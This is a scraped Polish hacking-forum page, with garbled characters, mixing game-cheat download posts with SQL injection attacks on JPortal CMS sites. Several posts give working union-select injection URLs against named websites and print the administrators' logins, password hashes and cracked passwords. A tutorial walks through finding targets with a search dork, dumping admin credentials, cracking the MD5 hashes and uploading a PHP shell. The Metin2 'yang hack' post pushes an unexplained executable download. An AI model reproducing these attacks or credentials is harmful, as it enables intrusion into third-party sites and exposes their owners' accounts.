Net Hax

[Metin] Cheats

Pištek 21 Listopad

EJ WES WYSLIJ LINK NA GG 7745832

[Cheat][CS-1.6] SSW v2.8

Czwartek 23 Padziernik

A ja znalaz�em wersj� 5.0 bez wirus�w w nieca�� minut�, no popatrz :)

Kod:

http://www.mpcdownloads.com/forums/downloads/CS1.6/SSW-(Super-Simple-Wall)-v5.0/7484.html

Klikamy na download na dole strony :) Aha, a kolega MD Hac(k)er �apie bana ;)

[Cheat][CS-1.6] SSW v2.8

Czwartek 23 Padziernik

Da�em wersje 2.8 bo inne posiada�y virusy tylko tyle powiem

[Kody] Counter Strike 1.6

roda 22 Padziernik

Siemka
Mam dzis do zaprezentowania Kody do Cs 1.6 no to zaczynamy

Podczas gry naciskamy tyld� ( ~ ) ( ten klawisz pod esc = escape ) Po nacisni�ciu w��czy si� konsola gdzie wpisuje si� kody ( dzia�aj� tylko na localho�cie, chyba �e mamy dost�p do RCONa, wtedy piszemy rcon_password "has�o", i piszemy np. rcon sv_gravity 800 )

sv_gravity 0-xxx --grawitacja ( domy�lnie 800 )
mp_autoteambalance 0-1 --automatyczny balans dru�yn ( dom. 1 )
mp_limitteam 0-xxx limit graczy w dru�ynie ( dom. 8 )
mp_c4timer 15s-xxxs czas wybuchu C4 w sekundach ( dom. 45s, min. 15s )
mp_flashlight 1 --je�li 1, gracze mog� u�ywa� latarek

Znam tylko takie, ale mam nadzieje ze pomog�em. Mi�ego grania.

// ReporteR: Ca�kowity brak ortografii ! Piszemy "dru�yn" a nie "dr�yn" ! U�ywaj przecink�w i kropek. 0 interpunkcji ! 1 ostrze�enie, za 2 nie masz mo�liwo�ci ubiegania si� o moda, za 3 ban. Jak piszesz posta, to przegl�darka podkre�la z�e s�owa. Skorzystaj z tego ! Ogarnij ch�opie, to forum a nie brudnopis...

[Cheat][CS-1.6] SSW v2.8

roda 22 Padziernik

Siema
Zaczne tak
Mam do zaprezentowania Super Simple WallHack v2.8 ten hack s�u�y do Counter Strike v.1.6
Mianowicie ten hack s�u�y do np. Widzenia przez sciany ja w nim odkry�em nawet funkcje latania ale to potem.
Hack pozwala nawet na zabicie wroga nawet za 4 scianami.
Ale nie b�de przynudza� oto hack.

Kod:

http://[XXXXXX].com[XXXXXX]53061189/[XXXXXX].rar.

Hack nie posiada zadnego virusa ale je�li sie boicie to przeskanujcie go sobie

Mam nadzieje �e chociarz troche pomog�em:D:D:D:D:D
Narq

// ReporteR: Nawet nie chce mi si� poprawia�. 0 jakiejkolwiek przejrzysto�ci posta ! I - o ile mi wiadomo - jest ju� wersja 5.0 ! A ty da�e� 2.8 ! I PRZECZYTAJ REGULAMIN ! NIE TOLERUJEMY [XXXXXX] ! No ale dam Co jeszcze jedn� szans�... :/

[Cheat] Metin2

roda 22 Padziernik

UWAGA! Wi�kszo�� program�w to zwyk�e oszusta graczy kt�rzy chc� zhakowa� Ci konto!!! Ja daje wam jedyny dzia�aj�cy yang-hack! Nie trzeba podawa� pass�w, maila itp.! Program jest bezpieczny! Jak kto� nie wierzy, niech nie pobiera, mi to zwisa, robi� to z dobrego serca xD

Skan pliku, jakby kto� my�la�, �e to wirus:

Kod:

http://www.virustotal.com/pl/analisis/a1934ee4e2bf1db842cc63

Download:

Kod:

http://www.speedyshare.com/376786393.html.

Instrukcja:

Pobieramy i uruchamiamy plik.
Otwiera si� nam czarne okienko
Czekamy..
Czekamy..
xD - trzeba troch� poczeka�
Wy�wietli si� nam napis: "please running metin2.exe"
Uruchamiamy metina
Mo�emy wy��czy� program
Teraz logujemy si� i patrzymy jak kasa leci

A oto postac jak� kupi�em za yangi dzi�ki hackowi:
http://img84.imageshack.us/my.php?image=1260wr2.jpg

[JPortal] www.prison.org.pl

roda 22 Padziernik

CMS: JPortal

B��d:

Kod:

http://www.prison.org.pl/articles.php?topic=-1+union+select+1,concat(nick,char(58),pass),3,4,5+from+jp_admins--

Wynik:

Kod:

cyber156:3d36e867fac87242d740bb25ceb551d9

Odkodowane:

Kod:

Login: cyber156
Has�o: prison

[JPortal] www.diabetica.pl

roda 22 Padziernik

CMS: JPortal

B��d:

Kod:

http://www.diabetica.pl/articles.php?topic=-1+union+select+1,concat(nick,char(58),pass),3,4,5+from+admins--

Wynik:

Kod:

admin:11dc4b47bdf21ac670554bb4bb5eaefb

Odkodowane:

Kod:

database : Nie znaleziono
passcracking.ru : Nie znaleziono
md5crack.com : Nie znaleziono
tydal.nu : Nie znaleziono
gdataonline.com : Nie znaleziono
securitystats.com : Nie znaleziono
milw0rm.com : Nie znaleziono
md5.rednoize.com : Nie znaleziono
md5decryption.com : Nie znaleziono
md5.thekaine.de : Nie znaleziono
authsecu.com : Nie znaleziono
generuj.pl : Nie znaleziono
hashcrack.com : Nie znaleziono
md5oogle.com : Nie znaleziono
md5.xpzone.de : Nie znaleziono
insidepro.com : Nie znaleziono
ice.breaker.free.fr : Nie znaleziono
md5decrypter.com : Nie znaleziono
hashkiller.com : Nie znaleziono
md5live.com : Nie znaleziono
md5crack.it-helpnet.de : Nie znaleziono
astalavista.net : Nie znaleziono
md5pass.info : Nie znaleziono
md5.xek.cc : Nie znaleziono
md5.3mt3.pl : Nie znaleziono
NIE MO�NA ODKODOWA� !!!

Panel Admina:

Kod:

http://www.diabetica.pl/admin.php

[JPortal] ferrari-f1.ovh.org

roda 22 Padziernik

CMS: JPortal

B��d:

Kod:

http://ferrari-f1.ovh.org/jportal/articles.php?topic=-1+union+select+1,concat(nick,char(58),pass),3,4,5+from+admins--

Wynik:

Kod:

Skowi:d917dd4906e97b999ec18f51ab95fde3

Odkodowane:

Kod:

Login: Skowi
Has�o: gkstychy

Panel Admina:

Kod:

http://ferrari-f1.ovh.org/jportal/admin.php

[Tutorial] Hacking JPortal 2

Wtorek 21 Padziernik

Poziom: �redni

Ka�dy od czego� zaczyna�. My dzisiaj zaczniemy przygod� z JPortalem - pow�drujemy przez kolumny, tabele, a� w ko�cu dojdziemy do celu - loginu i has�a administratora strony :)

Co potrzebujemy:

- Podstawow� wiedz� o SQL Injection ( union select ),
- Stron� opart� na CMS'ie JPortal 2,
- Myszk�, klawiatur�, internet, po wej�ciu we wpraw� ok. 2 min. na rozwalenie stronki.

Zaczynamy ! Najpierw potrzebujemy jakiej� strony opartej na JPortalu. Dlaczego ? Poniewa� ten CMS jest dziurawy jak ser szwajcarski. I to ju� nie moja opinia - ale widoczny fakt ! Ale nie o tym chc� pisa�. Ok, powr�t do tematu. Skorzystamy z Google Doorka ;)

Ukryta wiadomo��:
"Powered by JPortal"

Takie zapytanie do wujka google'a zwr�ci nam mas� stron ( polskich i zagranicznych ) opartych na tym CMS'ie. Wybieramy 1 na przyn�t� - aby nie by�a to jaka� zwyk�a stronka, wezm� tak� z domen� .PL, czyli pos�u�ymy si� przyk�adem:

Ukryta wiadomo��:
http://www.piaskovia.pl/

No dobrze, stron� ju� mamy, co dalej ? Musimy teraz znale�� b��d. Na czym to polega - musimy spowodowa�, �e baza danych zwr�ci warto�� b��dn� po podaniu do niej nieprawdziwego zapytania, np. id=-1. Jak wiemy - mo�e by� 1 post, 2 post, ale nie ma -1 posta ;) W przypadku JPortala znajdziemy b��d w ka�dym ( prawie ) zapytaniu ID - nie jest ono filtrowane. No dobrze, wi�c zobaczmy co� takiego:

Ukryta wiadomo��:
http://www.piaskovia.pl/articles.php?topic=-1

Wy�wietli si� sama strona - bez �adnych danych. Po prostu tj. pusty artyku�. Wywo�ajmy b��d, czyli zako�czmy polecenie SQL.

Ukryta wiadomo��:
http://www.piaskovia.pl/articles.php?topic=-1'

Co widzimy ?

Ukryta wiadomo��:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/piaskovi/public_html/module/art.inc.php on line 240

To b�dzie nasz przewodnik. Teraz musimy zbudowa� zapytanie z union select ( SQL Injection ).

Ukryta wiadomo��:
http://www.piaskovia.pl/articles.php?topic=-1+union+select+1--

Zapytanie to daje nam to samo co zapytanie z -1'. Ale zauwa�cie, �e tu ju� nie ma '. Teraz pojawi�o si� polecenie union select. A oto dok�adne wyja�nienie co jest czym:

Ukryta wiadomo��:
-1 | fa�szywa warto��
union select | wybieranie ( selekcja ) jakiej� warto�ci z bazy danych MySQL
+ | tutaj zast�puje spacj�. Nie mo�emy u�ywa� zwyk�ej spacji, poniewa� zapytanie nie b�dzie interpretowane przez baz�
1 | to liczba tabeli. Musimy po kolei dodawa� liczby ( 1-- 1,2-- 1,2,3-- ) tak d�ugo, a� b��d nie zniknie
-- | dzia�a jak ' - jest to oznaczenie ko�ca polecenia

No, teraz czas na dodawanie po kolei tabel tak d�ugo, a� b��d si� nie pojawi. Jedziemy po kolei:

Ukryta wiadomo��:
http://www.piaskovia.pl/articles.php?topic=-1+union+select+1--
http://www.piaskovia.pl/articles.php?to … lect+1,2--
http://www.piaskovia.pl/articles.php?to … ct+1,2,3--
http://www.piaskovia.pl/articles.php?to … +1,2,3,4--

Dalej mamy b��d. Ale teraz:

Ukryta wiadomo��:
http://www.piaskovia.pl/articles.php?topic=-1+union+select+1,2,3,4,5--

b��du nie ma ! Znikn��. Zamiast tego obok "Artyku�y >" pojawi�a si� liczba 2:

Ukryta wiadomo��:
Artyku�y > 2

Ta 2 to numer tabeli, w kt�ry mo�emy "wstrzykn��" nasz kod. No to zaczynamy. Wywo�amy polecenie concat:

Ukryta wiadomo��:
http://www.piaskovia.pl/articles.php?topic=-1+union+select+1,concat(nick,char(58),pass),3,4,5--

Polecenie nie zosta�o wykonane. Zamiast tego zn�w mamy error. Dlaczego ? Bo nie ma w zapytaniu sk�d ma pobra� te dane. Oto poprawne zapytanie:

Ukryta wiadomo��:
http://www.piaskovia.pl/articles.php?topic=-1+union+select+1,concat(nick,char(58),pass),3,4,5+from+jp_admins--

Obja�nienie:

Ukryta wiadomo��:
concat | wy�wietla kolumny podane w nawiasie
nick | domy�lna nazwa kolumny dla loginu
pass | domy�lna nazwa kolumny dla has�a
from | czyli z ( np. select login from users oznacza "wybierz login z users" ).
jp_admins | to nazwa tabeli, w kt�rej znajduj� si� has�a administrator�w. Najcz�ciej jest to "admins" lub "jp_admins".
char(58) | char oznacza, �e wstawiamy jaki� znak, a w nawiasie (58) podali�my kod ASCII tego znaku - w naszym wypadku dwukropek. Dzi�ki temu pomi�dzy loginem a has�em b�dzie dwukropek, np. admin:hash. Bez tego �le odczytywa�o by si� dane, np. adminhash.

No to mamy:

Ukryta wiadomo��:
admin:ac1836c26af209bf79b668afaa7daef2
login:has�o

Login: admin
Hash has�a MD5 ( nie has�o ! ): ac1836c26af209bf79b668afaa7daef2

Pami�tajcie, �e has�o jest zakodowane w algorytmie MD5 ! Musicie je odkodowa�. Polecam stronk�:

Ukryta wiadomo��:
http://md5search.org/

Wklejamy hash, przepisujemy kod z tokena, i ju� mamy wynik !

Ukryta wiadomo��:
database : waldorf

Czyli jak wida�:

Ukryta wiadomo��:
Login: admin
Has�o: waldorf

Teraz wystarczy wej�� w panel administratora:

Ukryta wiadomo��:
http://www.piaskovia.pl/admin.php

I zalogowa� si� na zdobyte dane :) Prawda �e proste ? I szybkie. Wbrew pozorom nie jest to takie trudne, na jakie wygl�da. Po kilku pr�bach sami b�dziecie poprawia� swoje b��dy, i �mia� si� z tw�rc�w JPortala ;) Na koniec ma�e informacje:

1. W JPortalu liczba kolumn zawsze ( 99,99% ) wynosi 5. Czyli zawsze wpisujemy 1,2,3,4,5-- ;)
2. Aby wgra� shella, wchodzimy na panel administratora, w menu klikamy "Download", i w "Uploaderze" podajemy �cie�k� do shella ( do shell.php ). Nast�pnie przechodzimy do http://www.strona.pl/uploads/download/n … hella.php. I ju� :) Na naszym przyk�adzie jest to:

Ukryta wiadomo��:
http://www.piaskovia.pl/uploads/download/shell.php

3. Nie ruszajcie podaje w przyk�adzie strony - ka�dy chce zobaczy� ! Nie zmieniajcie nic, po prostu uszanujcie to, �e inni te� chc� z tego skorzysta�.
4. Ten tutorial zosta� stworzony WY��CZNIE W CELACH EDUKACYJNYCH, i nie ponosz� odpowiedzialno�ci za nieumiej�tne lub niezgodne z prawem wykorzystanie jego zawarto�ci. Musia�em to napisa�...

Pozdrawiam, i zapowiadam nast�pny tutorial, w kt�rym bardziej zg��bimy tajemnice SQL Injection. Poznamy ataki na strony oparte na komercyjnych CMSach, a tak�e wykorzystamy w nich atak IS ( Information.Schema ). Gor�co zapraszam wszystkich do rejestracji - tylko wtedy zobaczycie co kryje si� w ukrytym tek�cie ;)

Advanced Anti Keylogger 3.7

Wtorek 21 Padziernik

Przyda si�, leci dla Ciebie reputek.

Advanced Anti Keylogger 3.7

Wtorek 21 Padziernik

Witajcie.
Pami�tacie dawne gry Online: Mu online, Tibia, Metin 2, Knight Online, Lineage 2...
Pami�tacie ile razy skradziono wam has�a do tych lub innych gier...
Tylko dlatego, �e przez przypadek pobrali�cie co� nieznajomego, albo odebrali�cie poczcie internetowej dziwny e-mail...

TO WSZYSTKO PRZEZ KEYLOGGERA !

Proponuje to: Advanced Anti Keylogger 3.7

KONIEC Z TRACENIEM KONT !
KONIEC DENERWOWANIA SI�, �E KTO� WAM UKRADNIE KONTO !

Zabezpieczcie si� Anty Keyloggerem, oto link:

Kod:

http://www.programosy.pl/program,anti-keylogger.html

// ReporteR: W temacie podajemy nazw�, a linki bierzemy w BBCode. Pami�taj o tym !

[Metin] Cheats

Wtorek 21 Padziernik

Siema. Zaczn� od dodania fajnych cheat�w do Metina2 . Oto 7 z nich:

- Yang Hack
- Exp Hack
- Fish Bot
- Radar Bot
- Monkey Bot
- Speed Hack

A tak�e:

- Cheat Engine - program dzia�a jak hexedytor - wyszukujemy warto��, po czym dowolnie j� modyfikujemy.

W tym temacie b�d� selektywnie dodawa� najnowsze produkcje. Oto 1 z nich - zawiera:

- Speed Hack
- Multihack Selector
- Fishing Bot
- Trade Bot

Oto link do pliku: http://[XXXXXX].com[XXXXXX]140521631/[XXXXXX].exe.html

// ReporteR: Przeczytaj regulamin. Link wymoderowano. Popraw to !